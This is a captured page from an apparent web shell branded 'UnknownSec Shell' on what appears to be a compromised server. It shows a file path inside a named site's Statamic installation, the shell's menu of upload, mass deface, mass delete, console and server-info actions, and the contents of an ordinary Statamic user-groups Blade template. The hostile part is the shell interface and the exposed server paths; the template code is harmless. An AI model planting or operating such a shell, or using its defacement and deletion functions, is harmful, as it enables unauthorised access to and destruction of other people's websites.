shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
views
/
usergroups
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
index.blade.php
@php use function Statamic\trans as __; @endphp @extends('statamic::layout') @section('title', __('User Groups')) @section('content') @unless($groups->isEmpty()) <div class="flex mb-6"> <h1 class="flex-1"> {{ __('User Groups') }} </h1> <a href="{{ cp_route('user-groups.create') }}" class="btn-primary">{{ __('Create User Group') }}</a> </div> <user-group-listing :initial-rows="{{ json_encode($groups) }}"></user-group-listing> @else @include('statamic::partials.empty-state', [ 'title' => __('User Groups'), 'description' => __('statamic::messages.user_groups_intro'), 'svg' => 'empty/users', 'button_text' => __('Create User Group'), 'button_url' => cp_route('user-groups.create'), ]) @endunless @include('statamic::partials.docs-callout', [ 'topic' => __('User Groups'), 'url' => Statamic::docsUrl('users#user-groups') ]) @endsection
© 2026 UnknownSec